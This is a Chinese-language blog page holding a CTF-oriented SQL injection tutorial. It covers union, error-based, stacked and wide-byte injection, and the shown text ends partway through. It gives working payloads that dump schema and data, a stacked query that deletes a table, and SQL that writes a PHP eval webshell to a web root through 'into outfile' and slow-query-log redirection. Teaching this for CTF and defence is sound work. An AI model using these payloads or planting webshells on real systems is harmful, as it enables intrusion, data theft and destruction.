<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ayan0.top","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.24.1","exturl":false,"sidebar":{"position":"left","width_expanded":280,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="从零开始的SQL注入生活 字义上的从零开始喵。。字义上的私了好多次喵。。。  Episode 1   SQL数据库基础操作">
<meta property="og:type" content="article">
<meta property="og:title" content="从零开始的SQL注入生活">
<meta property="og:url" content="https://ayan0.top/2025/03/09/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E7%94%9F%E6%B4%BB/">
<meta property="og:site_name" content="Blog of AyaN0">
<meta property="og:description" content="从零开始的SQL注入生活 字义上的从零开始喵。。字义上的私了好多次喵。。。  Episode 1   SQL数据库基础操作">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250402210544627.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250330124245041.png">
<meta property="og:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250330124258559.png">
<meta property="article:published_time" content="2025-03-09T03:26:48.000Z">
<meta property="article:modified_time" content="2025-08-09T07:11:58.215Z">
<meta property="article:author" content="AyaN0">
<meta property="article:tag" content="-web -CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250402210544627.png">


<link rel="canonical" href="https://ayan0.top/2025/03/09/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E7%94%9F%E6%B4%BB/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ayan0.top/2025/03/09/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E7%94%9F%E6%B4%BB/","path":"2025/03/09/从零开始的SQL注入生活/","title":"从零开始的SQL注入生活"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>从零开始的SQL注入生活 | Blog of AyaN0</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/lly.jpg" alt="Blog of AyaN0">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Blog of AyaN0</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84sql%E6%B3%A8%E5%85%A5%E7%94%9F%E6%B4%BB"><span class="nav-number">1.</span> <span class="nav-text"> 从零开始的SQL注入生活</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#episode-1-sql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%9F%BA%E7%A1%80%E6%93%8D%E4%BD%9C"><span class="nav-number">1.1.</span> <span class="nav-text"> Episode 1   SQL数据库基础操作</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#episode-2-%E5%9F%BA%E7%A1%80%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.</span> <span class="nav-text"> episode 2  基础注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#union%E6%B3%A8%E5%85%A5-1"><span class="nav-number">1.2.1.</span> <span class="nav-text"> union注入(-1’)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.2.</span> <span class="nav-text"> 报错注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.3.</span> <span class="nav-text"> 堆叠注入(!)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.4.</span> <span class="nav-text"> 二次注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.5.</span> <span class="nav-text"> 宽字节注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">1.2.5.1.</span> <span class="nav-text"> 原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E8%BF%87%E6%BB%A4%E5%87%BD%E6%95%B0"><span class="nav-number">1.2.5.2.</span> <span class="nav-text"> 常用过滤函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%E6%9D%A1%E4%BB%B6"><span class="nav-number">1.2.5.3.</span> <span class="nav-text"> 宽字节注入条件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#payload"><span class="nav-number">1.2.5.4.</span> <span class="nav-text"> payload</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BA%A6%E6%9D%9F%E6%94%BB%E5%87%BB"><span class="nav-number">1.2.6.</span> <span class="nav-text"> 约束攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#order-by%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.7.</span> <span class="nav-text"> Order by注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BC%82%E6%88%96%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.8.</span> <span class="nav-text"> 异或注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#episode-3-%E5%9C%A8%E6%8B%BF%E5%88%B0flag%E7%9A%84%E8%BE%B9%E7%BC%98%E7%96%AF%E7%8B%82%E8%AF%95%E6%8E%A2%E7%9B%B2%E6%B3%A8"><span class="nav-number">1.3.</span> <span class="nav-text"> Episode 3 在拿到flag的边缘疯狂试探:盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#episode-4-%E6%B3%A8%E5%85%A5%E7%82%B9%E7%8C%9C%E7%8C%9C%E6%88%91%E5%9C%A8%E5%93%AA%E9%87%8C%E5%91%A2"><span class="nav-number">1.4.</span> <span class="nav-text"> Episode 4 注入点:&gt;猜猜我在哪里呢</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#post%E6%B3%A8%E5%85%A5"><span class="nav-number">1.4.1.</span> <span class="nav-text"> POST注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#get%E6%B3%A8%E5%85%A5"><span class="nav-number">1.4.2.</span> <span class="nav-text"> GET注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cookies%E6%B3%A8%E5%85%A5"><span class="nav-number">1.4.3.</span> <span class="nav-text"> Cookies注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#episode-5-%E4%BD%A0%E5%A5%BD%E7%BB%95waf"><span class="nav-number">1.5.</span> <span class="nav-text"> Episode   5  你好，绕WAF</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.1.</span> <span class="nav-text"> 大小写绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8C%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.2.</span> <span class="nav-text"> 双写绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%A9%BA%E6%A0%BC%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.3.</span> <span class="nav-text"> 空格过滤绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BC%95%E5%8F%B7%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.4.</span> <span class="nav-text"> 引号绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#and%E5%92%8Cor%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.5.</span> <span class="nav-text"> and和or绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.6.</span> <span class="nav-text"> &#x3D;绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%97%E5%8F%B7%E8%BF%87%E6%BB%A4"><span class="nav-number">1.5.7.</span> <span class="nav-text"> 逗号过滤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%AF%94%E8%BE%83%E7%AC%A6%E5%8F%B7-%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.8.</span> <span class="nav-text"> 比较符号(&lt; &gt;)绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%85%B3%E9%94%AE%E5%AD%97unionselectwhere"><span class="nav-number">1.5.9.</span> <span class="nav-text"> 绕过关键字(union,select，where)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%9A%E7%94%A8%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.10.</span> <span class="nav-text"> 通用编码绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AD%89%E4%BB%B7%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.11.</span> <span class="nav-text"> 等价函数绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E7%BB%95%E8%BF%87"><span class="nav-number">1.5.12.</span> <span class="nav-text"> 长度限制绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#episode-6-%E6%A8%A1%E7%B3%8A%E5%8C%B9%E9%85%8D"><span class="nav-number">1.6.</span> <span class="nav-text"> Episode 6  模糊匹配</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#episode-7-%E5%A5%87%E5%A5%87%E6%80%AA%E6%80%AA%E7%9A%84%E7%9F%A5%E8%AF%86%E7%82%B9%E5%92%8C%E4%B8%80%E4%BA%9B%E6%8A%80%E5%B7%A7%E7%A7%AF%E7%B4%AF"><span class="nav-number">1.7.</span> <span class="nav-text"> Episode   7 奇奇怪怪的知识点和一些技巧积累</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9F%AD%E8%B7%AF%E7%AE%97%E6%B3%95"><span class="nav-number">1.7.1.</span> <span class="nav-text"> 短路算法：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#with-rollup%E6%9D%A5%E8%87%AActfshow-web10"><span class="nav-number">1.7.2.</span> <span class="nav-text"> WITH ROLLUP:(来自ctfshow web10)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E4%BC%AA%E9%80%A0"><span class="nav-number">1.7.3.</span> <span class="nav-text"> 联合查询伪造</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A%E5%92%8C%E9%9D%9E%E6%B3%A8%E9%87%8A%E9%97%AD%E5%90%88"><span class="nav-number">1.7.4.</span> <span class="nav-text"> 注释和非注释闭合</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#episode-8-%E4%B8%80%E7%82%B9%E6%84%9F%E6%83%B3"><span class="nav-number">1.8.</span> <span class="nav-text"> Episode   8 一点感想</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="AyaN0"
      src="/images/lly.jpg">
  <p class="site-author-name" itemprop="name">AyaN0</p>
  <div class="site-description" itemprop="description">不断的前进的人:只有0次摔倒或无数次的爬起</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">28</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/kisakiayano" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;kisakiayano" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1594453512@qq.com" title="E-Mail → 1594453512@qq.com" rel="noopener me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ayan0.top/2025/03/09/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E7%94%9F%E6%B4%BB/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/lly.jpg">
      <meta itemprop="name" content="AyaN0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog of AyaN0">
      <meta itemprop="description" content="不断的前进的人:只有0次摔倒或无数次的爬起">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="从零开始的SQL注入生活 | Blog of AyaN0">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          从零开始的SQL注入生活
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-03-09 11:26:48" itemprop="dateCreated datePublished" datetime="2025-03-09T11:26:48+08:00">2025-03-09</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-08-09 15:11:58" itemprop="dateModified" datetime="2025-08-09T15:11:58+08:00">2025-08-09</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>9.1k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>17 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="从零开始的sql注入生活"><a class="markdownIt-Anchor" href="#从零开始的sql注入生活"></a> 从零开始的SQL注入生活</h1>
<p>字义上的从零开始喵。。字义上的私了好多次喵。。。</p>
<h2 id="episode-1-sql数据库基础操作"><a class="markdownIt-Anchor" href="#episode-1-sql数据库基础操作"></a> Episode 1   SQL数据库基础操作</h2>
<ul>
<li><strong>创建</strong></li>
</ul>
<pre><code class="highlight sql"><span class="keyword">create</span> database_name;#建立一个数据库
<span class="keyword">create</span> <span class="keyword">table</span> table_name(
column1 datatype,
.......
);#建立一个表
</code></pre>
<ul>
<li><strong>查询</strong></li>
</ul>
<pre><code class="highlight sql"><span class="keyword">show</span> tables; <span class="operator">/</span><span class="operator">/</span>显示当前选中的数据库中的所有表名
<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users limit <span class="number">1</span>; <span class="operator">/</span><span class="operator">/</span>获取第一行的数据，可以通过这个方法得到表中所有的字段名，不会被大量数据顶走
<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> [表名]; #查询整表
<span class="keyword">select</span> [列名<span class="number">1</span>, 列名<span class="number">2</span>,...] <span class="keyword">from</span> [库名.表名]; #指定列查询
<span class="keyword">select</span> [表达式<span class="number">1</span>, 表达式<span class="number">2</span>,...] <span class="keyword">from</span> [库名.表名]; #查询表达式字段
group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata
<span class="keyword">select</span> group_concat(table_name) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span><span class="string">&#x27; &#x27;</span>
<span class="keyword">select</span> group_concat(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span><span class="string">&#x27; &#x27;</span>
<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> [表名] <span class="keyword">order</span> <span class="keyword">by</span> [排序字段] #排序
#条件查询<span class="keyword">Where</span>
(<span class="number">1</span>)比较运算符 (<span class="number">2</span>)<span class="keyword">BETWEEN</span> ... <span class="keyword">AND</span> ... (<span class="number">3</span>)<span class="keyword">IN</span> (<span class="number">4</span>)<span class="keyword">IS</span> <span class="keyword">NULL</span> (<span class="number">5</span>)<span class="keyword">LIKE</span> (<span class="number">6</span>)<span class="keyword">AND</span> (<span class="number">7</span>)<span class="keyword">OR</span> 
(<span class="number">8</span>)<span class="keyword">NOT</span>
<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> [表名] <span class="keyword">where</span> [条件];</code></pre>
<ul>
<li><strong>插入</strong></li>
</ul>
<pre><code class="highlight sql"><span class="keyword">insert</span> <span class="keyword">into</span> table_names (column1,column2,column3...)
<span class="keyword">insert</span> <span class="keyword">into</span> (table1,table2,table3) <span class="keyword">values</span> (value1,value2,value3) #替换键已存在的值
<span class="keyword">on</span> duplicate key <span class="keyword">update</span> ()#不会了，留个坑先(</code></pre>
<ul>
<li><strong>注马</strong></li>
</ul>
<pre><code class="highlight sql"><span class="keyword">select</span> &quot;&lt;?php eval($_POST[&#x27;cmd&#x27;]); ?&gt;&quot; <span class="keyword">into</span> outfile&quot;D:\\phpstudy_pro\\WWW\\shell.php&quot;
<span class="number">2.</span>利用日志文件写入木马
<span class="number">1.</span>开启日志功能

<span class="keyword">set</span> <span class="keyword">global</span> slow_query_log<span class="operator">=</span><span class="number">1</span>;
<span class="number">2.</span>设置日志存储路径

<span class="keyword">SET</span> <span class="keyword">GLOBAL</span> slow_query_log_file<span class="operator">=</span><span class="string">&#x27;D:\\phpstudy_pro\\WWW\\shell.php&#x27;</span>;
<span class="number">3.</span>执行<span class="keyword">sql</span>语句

<span class="keyword">select</span> <span class="string">&#x27;&lt;?php eval($_GET[H])?&gt;&#x27;</span> <span class="keyword">or</span> SLEEP(<span class="number">11</span>);
</code></pre>
<h2 id="episode-2-基础注入"><a class="markdownIt-Anchor" href="#episode-2-基础注入"></a> episode 2  基础注入</h2>
<h3 id="union注入-1"><a class="markdownIt-Anchor" href="#union注入-1"></a> union注入(-1’)</h3>
<p>union注入原本是用于合并多条select查询结果；通过-1造成前面一条查询语句返回为空，从而显示我们注入的查询语句。(因为网页只能够显示一条查询记录)</p>
<pre><code class="highlight sql">#<span class="number">1.</span>查表列数
<span class="number">-1</span>’<span class="keyword">order</span> <span class="keyword">by</span> <span class="number">1</span><span class="operator">~</span><span class="number">4</span>;
#查完后使用<span class="keyword">select</span> 语句
<span class="keyword">select</span> <span class="number">1</span>，<span class="number">2</span>，<span class="number">3</span>；
#查库名
<span class="number">-1</span>’<span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>，database()；
#查表名
<span class="number">-1</span>’<span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> group_concat(table_name)<span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>’security’),<span class="number">3</span>#
#查列名
<span class="number">-1</span>’<span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> group_concat(column_name)<span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema<span class="operator">=</span>’security’ <span class="keyword">and</span> table_name<span class="operator">=</span>’emails’),<span class="number">3</span>#
#直接查数据
<span class="number">-1</span>’<span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,(<span class="keyword">select</span> email_id <span class="keyword">from</span> emails limit <span class="number">2</span>,<span class="number">1</span>),<span class="number">3</span>#

#其实还是更推荐urlcode一下注释符号防止没有回弹(<span class="operator">%</span><span class="number">23</span>)</code></pre>
<p>那初学的师傅可能就会不明白这个1，2，3是什么意思</p>
<p>这个1，2，3实际是可以帮助我们快速判断列数的工具(<s>order by:那我呢？</s>)同时，这个1，2，3无关顺序，只要找到回显位并且已经爆出数据表的情况下就可以在回显位写注入语句进一步爆</p>
<p>也可以union all select ,这时前面的-1可以去掉</p>
<h3 id="报错注入"><a class="markdownIt-Anchor" href="#报错注入"></a> 报错注入</h3>
<p>1.extractvalue函数</p>
<p>查询对象xml某一个标签的值</p>
<p>如果查询的标签格式不对，就会报错</p>
<p>利用concat函数来链接两个字符串</p>
<p>查询数据库：’ and extractvalue(‘div’,concat(‘~’,database()))#</p>
<pre><code class="highlight sql"><span class="number">-1</span><span class="string">&#x27; and(select extractive(1,concat(&#x27;</span><span class="operator">~</span><span class="string">&#x27;,database())))#</span></code></pre>
<p>-&gt;查询div，~存在会报错</p>
<p>爆出~database（）</p>
<p>2.updatexml</p>
<p>更新xml文档内容</p>
<p>语法：updatexml(‘xml名’，’路径名’，更新值)；</p>
<p>同样道理，当没有对应路径的时候会报错</p>
<pre><code class="highlight plaintext">&#x27; and updatexml(&#x27;div&#x27;, concat(&#x27;~&#x27;,database()),&#x27;hi&#x27;)#
&#x27; union select 1,(extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))))--+
</code></pre>
<p>其他同上</p>
<h3 id="堆叠注入"><a class="markdownIt-Anchor" href="#堆叠注入"></a> 堆叠注入(!)</h3>
<p>在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为： Select * from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。</p>
<pre><code class="highlight plaintext">堆叠注入中奇怪的知识点
1.输入数字有回显而字符没有回显，说明了语句中存在||结构 (在sql中表示连接符号)
设置 sql_mode=PIPES_AS_CONCAT来转换操作符的作用。（sql_mode设置） 利用PIPES_AS_CONCAT令||起到连接符的作用。
</code></pre>
<h3 id="二次注入"><a class="markdownIt-Anchor" href="#二次注入"></a> 二次注入</h3>
<p>在正常注册(假设账户名为admin)后登录，尝试修改密码，使用admin’#这个用户名修改却发现成功修改了admin的密码，这就说明存在二次注入的漏洞了</p>
<pre><code class="highlight plaintext">二次注入，实际上就是在注入数据之后，利用系统查询数据的用脏数据进行第二次的攻击，从而达到入侵数据库的目的</code></pre>
<h3 id="宽字节注入"><a class="markdownIt-Anchor" href="#宽字节注入"></a> 宽字节注入</h3>
<h4 id="原理"><a class="markdownIt-Anchor" href="#原理"></a> <strong>原理</strong></h4>
<p>一般来说，如果开发人员在开发的时候，对传入的参数进行了特殊的函数处理，比如使用了trim()函数，htmlspecialchars()函数，addlashes函数，是可以过滤我们非法提交的参数，从而导致SQL注入无法成功。</p>
<p>作为攻击者，要完成的是对参数的拼接，从而导致恶意的SQL语句写入。作为开发者要完成的是SQL输出参数的一个过滤比如对恶意的字符进行转移</p>
<h4 id="常用过滤函数"><a class="markdownIt-Anchor" href="#常用过滤函数"></a> <strong>常用过滤函数</strong></h4>
<p><strong>trim()函数</strong><br>
移除字符串两侧的空白字符或其他预定义字符<br>
<strong>htmlspecialchars()函数</strong><br>
把预定义的字符&quot;&lt;“和”&gt;&quot;转换为HTML实体，预防XSS<br>
<strong>addslashes()函数</strong><br>
